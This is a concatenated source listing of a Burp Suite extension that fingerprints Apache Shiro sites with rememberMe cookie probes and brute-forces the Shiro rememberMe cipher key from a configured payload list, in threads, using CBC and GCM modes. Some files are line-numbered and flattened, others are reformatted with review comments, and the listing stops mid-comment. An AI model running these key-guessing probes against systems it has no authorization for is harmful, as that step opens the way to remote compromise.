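    // surfacing as a NullPointerException inside the worker thread.
    if (this.payloadList == null || this.payloadList.size() == 0) {
        throw new IllegalArgumentException("Application.ShiroCipherKeyExtension-获取的payloads为空,无法正常运行");
    }

    try {
        // NOTE(review): callClassName is concatenated into a class name that
        // is then loaded by reflection. The fixed package prefix limits what
        // can be resolved, but the value should only ever come from trusted
        // configuration; confirm against the caller.
        Class c = Class.forName("burp.Application.ShiroCipherKeyExtension.ExtensionMethod." + callClassName);
        Constructor cConstructor = c.getConstructor(
                GlobalVariableReader.class,
                GlobalPassiveScanVariableReader.class,
                IBurpExtenderCallbacks.class,
                YamlReader.class,
                IHttpRequestResponse.class,
                ShiroFingerprint.class,
                List.class,
                EncryptInterface.class,
                Date.class,
                Integer.class);

        // Boolean.TRUE.equals() treats a missing (null) config value as
        // "disabled" instead of failing on auto-unboxing.
        Boolean isScanCbcEncrypt = this.yamlReader.getBoolean("application.shiroCipherKeyExtension.config.isScanCbcEncrypt");
        if (Boolean.TRUE.equals(isScanCbcEncrypt) && !this.scanWithMode(cConstructor, false)) {
            return;
        }

        Boolean isScanGcmEncrypt = this.yamlReader.getBoolean("application.shiroCipherKeyExtension.config.isScanGcmEncrypt");
        if (Boolean.TRUE.equals(isScanGcmEncrypt) && !this.scanWithMode(cConstructor, true)) {
            return;
        }
    } catch (ClassNotFoundException | NoSuchMethodException | InstantiationException | IllegalAccessException | InvocationTargetException e) {
        e.printStackTrace(new PrintWriter(this.callbacks.getStderr(), true));
    }
}

/**
 * Runs the scan class once with the chosen cipher mode and publishes a hit.
 *
 * @param cConstructor constructor of the scan class resolved in run()
 * @param useGcm       true to use GcmEncrypt, false to use CbcEncrypt
 * @return false if the shared stop flag was already set (nothing was run and
 *         the caller should stop), true otherwise
 */
private boolean scanWithMode(Constructor cConstructor, boolean useGcm)
        throws InstantiationException, IllegalAccessException, InvocationTargetException {
    if (this.globalPassiveScanVariableReader.getBooleanData("isEndShiroCipherKeyTask")) {
        return false;
    }

    EncryptInterface encrypt;
    if (useGcm) {
        encrypt = new GcmEncrypt();
    } else {
        encrypt = new CbcEncrypt();
    }

    IShiroCipherKeyExtension scan = (IShiroCipherKeyExtension) cConstructor.newInstance(
            this.globalVariableReader,
            this.globalPassiveScanVariableReader,
            this.callbacks,
            this.yamlReader,
            this.baseRequestResponse,
            this.shiroFingerprint,
            this.payloadList,
            encrypt,
            this.startDate,
            this.getMaxExecutionTime());

    if (scan.isShiroCipherKeyExists()) {
        // Set the stop flag first so sibling workers can exit early, then
        // store the result object for the caller to pick up.
        this.globalPassiveScanVariableReader.putBooleanData("isEndShiroCipherKeyTask", true);
        this.globalPassiveScanVariableReader.putShiroCipherKeyExtensionData("shiroCipherKey", scan);
    }
    return true;
}

/**
 * Maximum execution time in seconds: the fixed base value plus six seconds
 * for every payload assigned to this worker.
 *
 * @return the time budget, boxed because the scan class constructor is
 *         looked up with Integer.class
 */
private Integer getMaxExecutionTime() {
    return this.maxExecutionTime + this.payloadList.size() * 6;
}
} // end of class ShiroCipherKey
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroCipherKeyExtension/ShiroCipherKeyThread.java:
--------------------------------------------------------------------------------
package burp.Application.ShiroCipherKeyExtension;

import java.util.List;
import java.util.ArrayList;

import burp.IHttpRequestResponse;
import burp.IBurpExtenderCallbacks;

import burp.Bootstrap.YamlReader;
import burp.Bootstrap.CustomHelpers;
import burp.Bootstrap.GlobalVariableReader;
import burp.Bootstrap.GlobalPassiveScanVariableReader;

import burp.Application.ShiroFingerprintExtension.ShiroFingerprint;

/**
 * Splits the configured payloads into chunks and runs one ShiroCipherKey
 * worker thread per chunk. The threads are started from the constructor.
 */
public class ShiroCipherKeyThread {
    // Type arguments in this file are restored: the listing shows them
    // stripped (for example "List> payloadChunk"), which would not compile.
    // The String element type is assumed from getStringList(); verify.
    private List<Thread> threadPool = new ArrayList<>();

    /**
     * Resets the shared stop flag, builds the workers and starts them.
     *
     * @throws IllegalArgumentException if callClassName is empty or no
     *                                  payloads are configured
     */
    public ShiroCipherKeyThread(GlobalVariableReader globalVariableReader,
                                GlobalPassiveScanVariableReader globalPassiveScanVariableReader,
                                IBurpExtenderCallbacks callbacks,
                                YamlReader yamlReader,
                                IHttpRequestResponse baseRequestResponse,
                                ShiroFingerprint shiroFingerprint,
                                String callClassName) {
        // Shared stop flag for the cipher key task. Once one worker finds a
        // key the others exit quickly, which avoids wasted work and stalls.
        // true = stop, false = keep going
        globalPassiveScanVariableReader.putBooleanData("isEndShiroCipherKeyTask", false);

        if (callClassName == null || callClassName.length() <= 0) {
            throw new IllegalArgumentException("Application.ShiroCipherKeyExtension-请输入要调用的插件名称");
        }

        List<String> payloads = yamlReader.getStringList("application.shiroCipherKeyExtension.config.payloads");
        if (payloads == null || payloads.size() == 0) {
            throw new IllegalArgumentException("Application.ShiroCipherKeyExtension-获取的payloads为空,无法正常运行");
        }

        // Split the payloads according to the configured thread count.
        // NOTE(review): how listChunkSplit treats a missing or non-positive
        // threadTotal is not visible here; confirm it cannot produce an
        // unbounded number of chunks (each chunk becomes a thread that sends
        // requests to the target).
        Integer shiroCipherKeyThreadTotal = yamlReader.getInteger("application.shiroCipherKeyExtension.config.threadTotal");
        List<List<String>> payloadChunk = CustomHelpers.listChunkSplit(payloads, shiroCipherKeyThreadTotal);

        // Build the workers
        for (List<String> payloadList : payloadChunk) {
            this.threadPool.add(new Thread(
                    new ShiroCipherKey(
                            globalVariableReader, globalPassiveScanVariableReader, callbacks,
                            yamlReader, baseRequestResponse, shiroFingerprint,
                            callClassName, payloadList)
            ));
        }

        // Start them
        for (Thread worker : this.threadPool) {
            worker.start();
        }
    }

    /**
     * Reports whether every worker thread has finished.
     *
     * @return true when no thread in the pool is alive (also true for an
     *         empty pool), false otherwise
     */
    public Boolean isTaskComplete() {
        for (Thread worker : this.threadPool) {
            if (worker.isAlive()) {
                return false;
            }
        }
        return true;
    }
}
-------------------------------------------------------------------------------- /src/main/java/burp/Application/ShiroFingerprintExtension/ExtensionInterface/AShiroFingerprintExtension.java: -------------------------------------------------------------------------------- 1 | package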
burp.Application.ShiroFingerprintExtension.ExtensionInterface; 2 | 3 | import burp.IHttpRequestResponse; 4 | 5 | /** 6 | * shiro指纹扩展的抽象类 7 | * 所有的shiro指纹检测的方法都要继承它并实现所有的接口 8 | */ 9 | public abstract class AShiroFingerprintExtension implements IShiroFingerprintExtension { 10 | private String extensionName = ""; 11 | 12 | private Boolean isRunExtension = false; 13 | 14 | private Boolean isShiroFingerprint = false; 15 | 16 | private String requestRememberMeCookieName = ""; 17 | private String requestRememberMeCookieValue = ""; 18 | 19 | private String responseRememberMeCookieName = ""; 20 | private String responseRememberMeCookieValue = ""; 21 | 22 | private IHttpRequestResponse newHttpRequestResponse; 23 | 24 | /** 25 | * 设置扩展名称 (必须的) 26 | * 27 | * @param value 28 | */ 29 | protected void setExtensionName(String value) { 30 | if (value == null || value.isEmpty()) { 31 | throw new IllegalArgumentException("shiro指纹扫描扩展-扩展名称不能为空"); 32 | } 33 | this.extensionName = value; 34 | } 35 | 36 | /** 37 | * 扩展名称检查 38 | * 作用: 让所有不设置扩展名称的扩展无法正常使用, 防止直接调用本类的其他方法, 保证扩展的正常 39 | */ 40 | private void extensionNameCheck() { 41 | if (this.extensionName == null || this.extensionName.isEmpty()) { 42 | throw new IllegalArgumentException("请为该shiro指纹扫描扩展-设置扩展名称"); 43 | } 44 | } 45 | 46 | /** 47 | * 获取扩展名称 48 | * 49 | * @return String 50 | */ 51 | @Override 52 | public String getExtensionName() { 53 | this.extensionNameCheck(); 54 | return this.extensionName; 55 | } 56 | 57 | /** 58 | * 注册插件 (必须的) 59 | * 扩展在运行之前必须调用该接口注册, 否则将无法调用本类的其他方法 60 | */ 61 | protected void registerExtension() { 62 | this.extensionNameCheck(); 63 | this.isRunExtension = true; 64 | } 65 | 66 | /** 67 | * 注册扩展检查 68 | * 作用: 让所有未调用方法 registerExtension() 的接口, 无法使用本类的其他方法, 保证扩展的正常 69 | */ 70 | private void registerExtensionCheck() { 71 | if (!this.isRunExtension) { 72 | throw new IllegalArgumentException("注意: 该指纹模块未注册,无法使用"); 73 | } 74 | } 75 | 76 | /** 77 | * 是否运行扩展 78 | * true 运行 79 | * false 不运行 80 | * 81 | * @return 
Boolean 82 | */ 83 | @Override 84 | public Boolean isRunExtension() { 85 | return this.isRunExtension; 86 | } 87 | 88 | /** 89 | * 设置为shiro指纹 90 | */ 91 | protected void setShiroFingerprint() { 92 | this.registerExtensionCheck(); 93 | this.isShiroFingerprint = true; 94 | } 95 | 96 | /** 97 | * 是否shiro框架 98 | * 99 | * @return Boolean 100 | */ 101 | @Override 102 | public Boolean isShiroFingerprint() { 103 | this.registerExtensionCheck(); 104 | return this.isShiroFingerprint; 105 | } 106 | 107 | /** 108 | * 设置请求默认“记住我”的Cookie名 109 | * 110 | * @param value 111 | */ 112 | protected void setRequestDefaultRememberMeCookieName(String value) { 113 | this.registerExtensionCheck(); 114 | this.requestRememberMeCookieName = value; 115 | } 116 | 117 | /** 118 | * 获取请求默认“记住我”的Cookie名 119 | * 120 | * @return String 121 | */ 122 | @Override 123 | public String getRequestDefaultRememberMeCookieName() { 124 | this.registerExtensionCheck(); 125 | return this.requestRememberMeCookieName; 126 | } 127 | 128 | /** 129 | * 设置请求默认“记住我”的Cookie值 130 | * 131 | * @param value 132 | */ 133 | protected void setRequestDefaultRememberMeCookieValue(String value) { 134 | this.registerExtensionCheck(); 135 | this.requestRememberMeCookieValue = value; 136 | } 137 | 138 | /** 139 | * 获取请求默认“记住我”的Cookie值 140 | * 141 | * @return String 142 | */ 143 | @Override 144 | public String getRequestDefaultRememberMeCookieValue() { 145 | this.registerExtensionCheck(); 146 | return this.requestRememberMeCookieValue; 147 | } 148 | 149 | /** 150 | * 设置响应默认“记住我”的Cookie名称 151 | * 152 | * @param value 153 | */ 154 | protected void setResponseDefaultRememberMeCookieName(String value) { 155 | this.registerExtensionCheck(); 156 | this.responseRememberMeCookieName = value; 157 | } 158 | 159 | /** 160 | * 获取响应默认“记住我”的Cookie名称 161 | * 162 | * @return String 163 | */ 164 | @Override 165 | public String getResponseDefaultRememberMeCookieName() { 166 | this.registerExtensionCheck(); 167 | return 
this.responseRememberMeCookieName; 168 | } 169 | 170 | /** 171 | * 设置响应默认的“记住我”Cookie值 172 | * 173 | * @param value 174 | */ 175 | protected void setResponseDefaultRememberMeCookieValue(String value) { 176 | this.registerExtensionCheck(); 177 | this.responseRememberMeCookieValue = value; 178 | } 179 | 180 | /** 181 | * 获取设置响应默认的“记住我”Cookie值 182 | * 183 | * @return 184 | */ 185 | @Override 186 | public String getResponseDefaultRememberMeCookieValue() { 187 | this.registerExtensionCheck(); 188 | return this.responseRememberMeCookieValue; 189 | } 190 | 191 | /** 192 | * 设置http请求与响应对象 193 | * 194 | * @param httpRequestResponse 195 | */ 196 | protected void setHttpRequestResponse(IHttpRequestResponse httpRequestResponse) { 197 | this.registerExtensionCheck(); 198 | this.newHttpRequestResponse = httpRequestResponse; 199 | } 200 | 201 | /** 202 | * 获取http请求与响应对象 203 | * 204 | * @return IHttpRequestResponse 205 | */ 206 | @Override 207 | public IHttpRequestResponse getHttpRequestResponse() { 208 | this.registerExtensionCheck(); 209 | return this.newHttpRequestResponse; 210 | } 211 | } -------------------------------------------------------------------------------- /src/main/java/burp/Application/ShiroFingerprintExtension/ExtensionInterface/IShiroFingerprintExtension.java: -------------------------------------------------------------------------------- 1 | package burp.Application.ShiroFingerprintExtension.ExtensionInterface; 2 | 3 | import burp.IScanIssue; 4 | import burp.IHttpRequestResponse; 5 | 6 | /** 7 | * shiro指纹扩展的公共接口 8 | * 所有的抽象类都要继承它并实现所有的接口 9 | */ 10 | public interface IShiroFingerprintExtension { 11 | String getExtensionName(); 12 | 13 | Boolean isRunExtension(); 14 | 15 | Boolean isShiroFingerprint(); 16 | 17 | String getRequestDefaultRememberMeCookieName(); 18 | 19 | String getRequestDefaultRememberMeCookieValue(); 20 | 21 | String getResponseDefaultRememberMeCookieName(); 22 | 23 | String getResponseDefaultRememberMeCookieValue(); 24 | 25 | 
IHttpRequestResponse getHttpRequestResponse(); 26 | 27 | IScanIssue export(); 28 | 29 | void consoleExport(); 30 | } 31 | -------------------------------------------------------------------------------- /src/main/java/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint1.java: -------------------------------------------------------------------------------- 1 | package burp.Application.ShiroFingerprintExtension.ExtensionMethod; 2 | 3 | import burp.*; 4 | import burp.Application.ShiroFingerprintExtension.ExtensionInterface.AShiroFingerprintExtension; 5 | import burp.Bootstrap.YamlReader; 6 | 7 | import java.io.PrintWriter; 8 | import java.net.URL; 9 | 10 | public class ShiroFingerprint1 extends AShiroFingerprintExtension { 11 | private IBurpExtenderCallbacks callbacks; 12 | private IExtensionHelpers helpers; 13 | 14 | private YamlReader yamlReader; 15 | 16 | private IHttpRequestResponse baseRequestResponse; 17 | 18 | private String rememberMeCookieName = "rememberMe"; 19 | private String rememberMeCookieValue = "1"; 20 | 21 | public ShiroFingerprint1(IBurpExtenderCallbacks callbacks, YamlReader yamlReader, IHttpRequestResponse baseRequestResponse) { 22 | this.callbacks = callbacks; 23 | this.helpers = callbacks.getHelpers(); 24 | 25 | this.yamlReader = yamlReader; 26 | 27 | this.baseRequestResponse = baseRequestResponse; 28 | 29 | this.setExtensionName("ShiroFingerprint1"); 30 | 31 | this.runConditionCheck(); 32 | } 33 | 34 | private void runConditionCheck() { 35 | this.registerExtension(); 36 | } 37 | 38 | public void runExtension() { 39 | if (!this.isRunExtension()) { 40 | return; 41 | } 42 | 43 | IHttpService httpService = this.baseRequestResponse.getHttpService(); 44 | 45 | IParameter newParameter = this.helpers.buildParameter(this.rememberMeCookieName, this.rememberMeCookieValue, (byte) 2); 46 | byte[] newRequest = this.helpers.updateParameter(this.baseRequestResponse.getRequest(), newParameter); 47 | IHttpRequestResponse 
newHttpRequestResponse = this.callbacks.makeHttpRequest(httpService, newRequest); 48 | 49 | this.setHttpRequestResponse(newHttpRequestResponse); 50 | 51 | for (ICookie c : this.helpers.analyzeResponse(newHttpRequestResponse.getResponse()).getCookies()) { 52 | if (c.getName().equals(this.rememberMeCookieName)) { 53 | this.setShiroFingerprint(); 54 | 55 | this.setRequestDefaultRememberMeCookieName(this.rememberMeCookieName); 56 | this.setRequestDefaultRememberMeCookieValue(this.rememberMeCookieValue); 57 | 58 | this.setResponseDefaultRememberMeCookieName(c.getName()); 59 | this.setResponseDefaultRememberMeCookieValue(c.getValue()); 60 | break; 61 | } 62 | } 63 | } 64 | 65 | @Override 66 | public IScanIssue export() { 67 | if (!this.isRunExtension()) { 68 | return null; 69 | } 70 | 71 | if (!this.isShiroFingerprint()) { 72 | return null; 73 | } 74 | 75 | IHttpRequestResponse newHttpRequestResponse = this.getHttpRequestResponse(); 76 | URL newHttpRequestUrl = this.helpers.analyzeRequest(newHttpRequestResponse).getUrl(); 77 | 78 | String str1 = String.format("
============ShiroFingerprintDetail============
"); 79 | String str2 = String.format("ExtensionMethod: %s
", this.getExtensionName()); 80 | String str3 = String.format("RequestCookiePayload: %s=%s
", 81 | this.getRequestDefaultRememberMeCookieName(), 82 | this.getRequestDefaultRememberMeCookieValue()); 83 | String str4 = String.format("ResponseReturnCookie: %s=%s
", 84 | this.getResponseDefaultRememberMeCookieName(), 85 | this.getResponseDefaultRememberMeCookieValue()); 86 | String str5 = String.format("=====================================
"); 87 | 88 | String detail = str1 + str2 + str3 + str4 + str5; 89 | 90 | String shiroFingerprintIssueName = this.yamlReader.getString("application.shiroFingerprintExtension.config.issueName"); 91 | 92 | return new CustomScanIssue( 93 | newHttpRequestUrl, 94 | shiroFingerprintIssueName, 95 | 0, 96 | "Information", 97 | "Certain", 98 | null, 99 | null, 100 | detail, 101 | null, 102 | new IHttpRequestResponse[]{newHttpRequestResponse}, 103 | newHttpRequestResponse.getHttpService() 104 | ); 105 | } 106 | 107 | @Override 108 | public void consoleExport() { 109 | if (!this.isRunExtension()) { 110 | return; 111 | } 112 | 113 | if (!this.isShiroFingerprint()) { 114 | return; 115 | } 116 | 117 | IHttpRequestResponse newHttpRequestResponse = this.getHttpRequestResponse(); 118 | URL newHttpRequestUrl = this.helpers.analyzeRequest(newHttpRequestResponse).getUrl(); 119 | String newHttpRequestMethod = this.helpers.analyzeRequest(newHttpRequestResponse.getRequest()).getMethod(); 120 | int newHttpResponseStatusCode = this.helpers.analyzeResponse(newHttpRequestResponse.getResponse()).getStatusCode(); 121 | 122 | PrintWriter stdout = new PrintWriter(this.callbacks.getStdout(), true); 123 | 124 | stdout.println(""); 125 | stdout.println("==============shiro指纹详情============"); 126 | stdout.println("你好呀~ (≧ω≦*)喵~"); 127 | stdout.println("这边检测到有一个站点使用了 shiro框架 喵~"); 128 | stdout.println(String.format("负责检测的插件: %s", this.getExtensionName())); 129 | stdout.println(String.format("url: %s", newHttpRequestUrl)); 130 | stdout.println(String.format("请求方法: %s", newHttpRequestMethod)); 131 | stdout.println(String.format("页面http状态: %d", newHttpResponseStatusCode)); 132 | stdout.println(String.format("请求对应的cookie: %s=%s", 133 | this.getRequestDefaultRememberMeCookieName(), 134 | this.getRequestDefaultRememberMeCookieValue())); 135 | stdout.println(String.format("响应返回的cookie: %s=%s", 136 | this.getResponseDefaultRememberMeCookieName(), 137 | this.getResponseDefaultRememberMeCookieValue())); 138 | 
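stdout.println("详情请查看-Burp Scanner模块-Issue activity界面"); 139 | stdout.println("==================================="); 140 | stdout.println(""); 141 | } 142 | } 143 | -------------------------------------------------------------------------------- /src/main/java/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint2.java: -------------------------------------------------------------------------------- 1 | package burp.Application.ShiroFingerprintExtension.ExtensionMethod; 2 | 3 | import burp.*; 4 | import burp.Application.ShiroFingerprintExtension.ExtensionInterface.AShiroFingerprintExtension; 5 | import burp.Bootstrap.YamlReader; 6 | 7 | import java.io.PrintWriter; 8 | import java.net.URL; 9 | 10 | public class ShiroFingerprint2 extends AShiroFingerprintExtension { 11 | private IBurpExtenderCallbacks callbacks; 12 | private IExtensionHelpers helpers; 13 | 14 | private YamlReader yamlReader; 15 | 16 | private IHttpRequestResponse baseRequestResponse; 17 | 18 | private String rememberMeCookieValue = "2"; 19 |
    /**
     * Stores the collaborators, names the extension and decides whether it
     * applies to this request/response pair (see runConditionCheck()).
     */
    public ShiroFingerprint2(IBurpExtenderCallbacks callbacks, YamlReader yamlReader, IHttpRequestResponse baseRequestResponse) {
        this.callbacks = callbacks;
        this.helpers = callbacks.getHelpers();

        this.yamlReader = yamlReader;

        this.baseRequestResponse = baseRequestResponse;

        this.setExtensionName("ShiroFingerprint2");

        this.runConditionCheck();
    }

    /**
     * Returns the first cookie in the original response whose value is
     * "deleteMe", or null if there is none or there is no response at all.
     *
     * The response comes from the scanned server and is untrusted, so the
     * comparison is written constant-first: a cookie without a value must not
     * take the check down with a NullPointerException.
     */
    private ICookie findDeleteMeCookie() {
        byte[] response = this.baseRequestResponse.getResponse();
        if (response == null) {
            return null;
        }

        for (ICookie c : this.helpers.analyzeResponse(response).getCookies()) {
            if ("deleteMe".equals(c.getValue())) {
                return c;
            }
        }
        return null;
    }

    /**
     * This flow is entered when a cookie in the original response carries
     * the value deleteMe.
     */
    private void runConditionCheck() {
        if (this.findDeleteMeCookie() != null) {
            this.registerExtension();
        }
    }

    /**
     * Marks the target as Shiro, re-sends the request with the remember-me
     * cookie set to this extension's probe value, and records the cookie
     * names and values involved. Does nothing if the extension did not
     * register itself.
     */
    public void runExtension() {
        if (!this.isRunExtension()) {
            return;
        }

        // Save the base request/response first
        this.setHttpRequestResponse(this.baseRequestResponse);

        ICookie c = this.findDeleteMeCookie();
        if (c == null) {
            return;
        }

        this.setShiroFingerprint();

        // Rebuild a request using the cookie name taken from the response and
        // send it; the re-confirmed pair reflects the target most faithfully.
        IHttpRequestResponse newHttpRequestResponse = this.getNewHttpRequestResponse(
                c.getName(),
                this.rememberMeCookieValue);

        // Keep the confirmed pair, replacing the base pair saved above.
        this.setHttpRequestResponse(newHttpRequestResponse);

        this.setRequestDefaultRememberMeCookieName(c.getName());
        this.setRequestDefaultRememberMeCookieValue(this.rememberMeCookieValue);

        this.setResponseDefaultRememberMeCookieName(c.getName());
        this.setResponseDefaultRememberMeCookieValue(c.getValue());
    }

    /**
     * Sends the base request again with one cookie added or replaced.
     *
     * @param rememberMeCookieName  cookie name to set
     * @param rememberMeCookieValue cookie value to set
     * @return IHttpRequestResponse the new request together with its response
     */
    private IHttpRequestResponse getNewHttpRequestResponse(String rememberMeCookieName, String rememberMeCookieValue) {
        IHttpService httpService = this.baseRequestResponse.getHttpService();
        // PARAM_COOKIE is the named form of the literal (byte) 2 used before.
        IParameter newParameter = this.helpers.buildParameter(
                rememberMeCookieName,
                rememberMeCookieValue,
                IParameter.PARAM_COOKIE);
        byte[] newRequest = this.helpers.updateParameter(this.baseRequestResponse.getRequest(), newParameter);
        return this.callbacks.makeHttpRequest(httpService, newRequest);
    }

95 | @Override 96 | public IScanIssue export() { 97 | if (!this.isRunExtension()) { 98 | return null; 99 | } 100 | 101 | if (!this.isShiroFingerprint()) { 102 | return null; 103 | } 104 | 105 | IHttpRequestResponse baseHttpRequestResponse = this.getHttpRequestResponse(); 106 | URL newHttpRequestUrl = this.helpers.analyzeRequest(baseHttpRequestResponse).getUrl(); 107 | 108 | String str1 = String.format("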
============ShiroFingerprintDetail============
"); 109 | String str2 = String.format("ExtensionMethod: %s
", this.getExtensionName()); 110 | String str3 = String.format("RequestCookiePayload: %s=%s
", 111 | this.getRequestDefaultRememberMeCookieName(), 112 | this.getRequestDefaultRememberMeCookieValue()); 113 | String str4 = String.format("ResponseReturnCookie: %s=%s
", 114 | this.getResponseDefaultRememberMeCookieName(), 115 | this.getResponseDefaultRememberMeCookieValue()); 116 | String str5 = String.format("=====================================
"); 117 | 118 | String detail = str1 + str2 + str3 + str4 + str5; 119 | 120 | String shiroFingerprintIssueName = this.yamlReader.getString("application.shiroFingerprintExtension.config.issueName"); 121 | 122 | return new CustomScanIssue( 123 | newHttpRequestUrl, 124 | shiroFingerprintIssueName, 125 | 0, 126 | "Information", 127 | "Certain", 128 | null, 129 | null, 130 | detail, 131 | null, 132 | new IHttpRequestResponse[]{baseHttpRequestResponse}, 133 | baseHttpRequestResponse.getHttpService() 134 | ); 135 | } 136 | 137 | @Override 138 | public void consoleExport() { 139 | if (!this.isRunExtension()) { 140 | return; 141 | } 142 | 143 | if (!this.isShiroFingerprint()) { 144 | return; 145 | } 146 | 147 | IHttpRequestResponse baseHttpRequestResponse = this.getHttpRequestResponse(); 148 | URL baseHttpRequestUrl = this.helpers.analyzeRequest(baseHttpRequestResponse).getUrl(); 149 | String baseHttpRequestMethod = this.helpers.analyzeRequest(baseHttpRequestResponse.getRequest()).getMethod(); 150 | int baseHttpResponseStatusCode = this.helpers.analyzeResponse(baseHttpRequestResponse.getResponse()).getStatusCode(); 151 | 152 | PrintWriter stdout = new PrintWriter(this.callbacks.getStdout(), true); 153 | 154 | stdout.println(""); 155 | stdout.println("=============shiro指纹详情============"); 156 | stdout.println("你好呀~ (≧ω≦*)喵~"); 157 | stdout.println("这边检测到有一个站点使用了 shiro框架 喵~"); 158 | stdout.println(String.format("负责检测的插件: %s", this.getExtensionName())); 159 | stdout.println(String.format("url: %s", baseHttpRequestUrl)); 160 | stdout.println(String.format("请求方法: %s", baseHttpRequestMethod)); 161 | stdout.println(String.format("页面http状态: %d", baseHttpResponseStatusCode)); 162 | stdout.println("注意: 原始请求响应返回了 shiro 关键字所以没有发送新请求"); 163 | stdout.println(String.format("请求对应的cookie: %s=%s", 164 | this.getRequestDefaultRememberMeCookieName(), 165 | this.getRequestDefaultRememberMeCookieValue())); 166 | stdout.println(String.format("响应返回的cookie: %s=%s", 167 | 
this.getResponseDefaultRememberMeCookieName(), 168 | this.getResponseDefaultRememberMeCookieValue())); 169 | stdout.println("详情请查看-Burp Scanner模块-Issue activity界面"); 170 | stdout.println("==================================="); 171 | stdout.println(""); 172 | } 173 | } 174 | -------------------------------------------------------------------------------- /src/main/java/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint3.java: -------------------------------------------------------------------------------- 1 | package burp.Application.ShiroFingerprintExtension.ExtensionMethod; 2 | 3 | import burp.*; 4 | import burp.Application.ShiroFingerprintExtension.ExtensionInterface.AShiroFingerprintExtension; 5 | import burp.Bootstrap.YamlReader; 6 | 7 | import java.io.PrintWriter; 8 | import java.net.URL; 9 | 10 | public class ShiroFingerprint3 extends AShiroFingerprintExtension { 11 | private IBurpExtenderCallbacks callbacks; 12 | private IExtensionHelpers helpers; 13 | 14 | private YamlReader yamlReader; 15 | 16 | private IHttpRequestResponse baseRequestResponse; 17 | 18 | private String rememberMeCookieName = "rememberMe"; 19 | private String rememberMeCookieValue = "3"; 20 | 21 | public ShiroFingerprint3(IBurpExtenderCallbacks callbacks, YamlReader yamlReader, IHttpRequestResponse baseRequestResponse) { 22 | this.callbacks = callbacks; 23 | this.helpers = callbacks.getHelpers(); 24 | 25 | this.yamlReader = yamlReader; 26 | 27 | this.baseRequestResponse = baseRequestResponse; 28 | 29 | this.setExtensionName("ShiroFingerprint3"); 30 | 31 | this.runConditionCheck(); 32 | } 33 | 34 | /** 35 | * 原始请求 cookie 的 key 带了 rememberMe 则进入该流程 36 | */ 37 | private void runConditionCheck() { 38 | for (IParameter p : this.helpers.analyzeRequest(this.baseRequestResponse.getRequest()).getParameters()) { 39 | if (p.getType() != 2) { 40 | continue; 41 | } 42 | if (!p.getName().equals(this.rememberMeCookieName)) { 43 | continue; 44 | } 45 | if (p.getValue() == null || 
p.getValue().length() <= 0) { 46 | continue; 47 | } 48 | 49 | for (ICookie c : this.helpers.analyzeResponse(this.baseRequestResponse.getResponse()).getCookies()) { 50 | if (c.getName().equals(this.rememberMeCookieName)) { 51 | if (c.getValue().equals("deleteMe")) { 52 | this.registerExtension(); 53 | return; 54 | } 55 | } 56 | } 57 | } 58 | } 59 | 60 | public void runExtension() { 61 | if (!this.isRunExtension()) { 62 | return; 63 | } 64 | 65 | this.setHttpRequestResponse(this.baseRequestResponse); 66 | 67 | for (ICookie c : this.helpers.analyzeResponse(this.baseRequestResponse.getResponse()).getCookies()) { 68 | if (c.getName().equals(this.rememberMeCookieName)) { 69 | if (c.getValue().equals("deleteMe")) { 70 | this.setShiroFingerprint(); 71 | 72 | this.setRequestDefaultRememberMeCookieName(this.rememberMeCookieName); 73 | this.setRequestDefaultRememberMeCookieValue(this.rememberMeCookieValue); 74 | 75 | this.setResponseDefaultRememberMeCookieName(c.getName()); 76 | this.setResponseDefaultRememberMeCookieValue(c.getValue()); 77 | break; 78 | } 79 | } 80 | } 81 | } 82 | 83 | @Override 84 | public IScanIssue export() { 85 | if (!this.isRunExtension()) { 86 | return null; 87 | } 88 | 89 | if (!this.isShiroFingerprint()) { 90 | return null; 91 | } 92 | 93 | IHttpRequestResponse baseHttpRequestResponse = this.getHttpRequestResponse(); 94 | URL newHttpRequestUrl = this.helpers.analyzeRequest(baseHttpRequestResponse).getUrl(); 95 | 96 | String str1 = String.format("
============ShiroFingerprintDetail============
"); 97 | String str2 = String.format("ExtensionMethod: %s
", this.getExtensionName()); 98 | String str3 = String.format("RequestCookiePayload: %s=%s
", 99 | this.getRequestDefaultRememberMeCookieName(), 100 | this.getRequestDefaultRememberMeCookieValue()); 101 | String str4 = String.format("ResponseReturnCookie: %s=%s
", 102 | this.getResponseDefaultRememberMeCookieName(), 103 | this.getResponseDefaultRememberMeCookieValue()); 104 | String str5 = String.format("=====================================
"); 105 | 106 | String detail = str1 + str2 + str3 + str4 + str5; 107 | 108 | String shiroFingerprintIssueName = this.yamlReader.getString("application.shiroFingerprintExtension.config.issueName"); 109 | 110 | return new CustomScanIssue( 111 | newHttpRequestUrl, 112 | shiroFingerprintIssueName, 113 | 0, 114 | "Information", 115 | "Certain", 116 | null, 117 | null, 118 | detail, 119 | null, 120 | new IHttpRequestResponse[]{baseHttpRequestResponse}, 121 | baseHttpRequestResponse.getHttpService() 122 | ); 123 | } 124 | 125 | @Override 126 | public void consoleExport() { 127 | if (!this.isRunExtension()) { 128 | return; 129 | } 130 | 131 | if (!this.isShiroFingerprint()) { 132 | return; 133 | } 134 | 135 | IHttpRequestResponse baseHttpRequestResponse = this.getHttpRequestResponse(); 136 | URL baseHttpRequestUrl = this.helpers.analyzeRequest(baseHttpRequestResponse).getUrl(); 137 | String baseHttpRequestMethod = this.helpers.analyzeRequest(baseHttpRequestResponse.getRequest()).getMethod(); 138 | int baseHttpResponseStatusCode = this.helpers.analyzeResponse(baseHttpRequestResponse.getResponse()).getStatusCode(); 139 | 140 | PrintWriter stdout = new PrintWriter(this.callbacks.getStdout(), true); 141 | 142 | stdout.println(""); 143 | stdout.println("==============shiro指纹详情============"); 144 | stdout.println("你好呀~ (≧ω≦*)喵~"); 145 | stdout.println("这边检测到有一个站点使用了 shiro框架 喵~"); 146 | stdout.println(String.format("负责检测的插件: %s", this.getExtensionName())); 147 | stdout.println(String.format("url: %s", baseHttpRequestUrl)); 148 | stdout.println(String.format("请求方法: %s", baseHttpRequestMethod)); 149 | stdout.println(String.format("页面http状态: %d", baseHttpResponseStatusCode)); 150 | stdout.println("注意: 原始请求自己添加了 shiro 关键字所以没有发送新请求"); 151 | stdout.println(String.format("请求对应的cookie: %s=%s", 152 | this.getRequestDefaultRememberMeCookieName(), 153 | this.getRequestDefaultRememberMeCookieValue())); 154 | stdout.println(String.format("响应返回的cookie: %s=%s", 155 | 
/**
 * Picks the fingerprint probe that applies to one request/response pair and
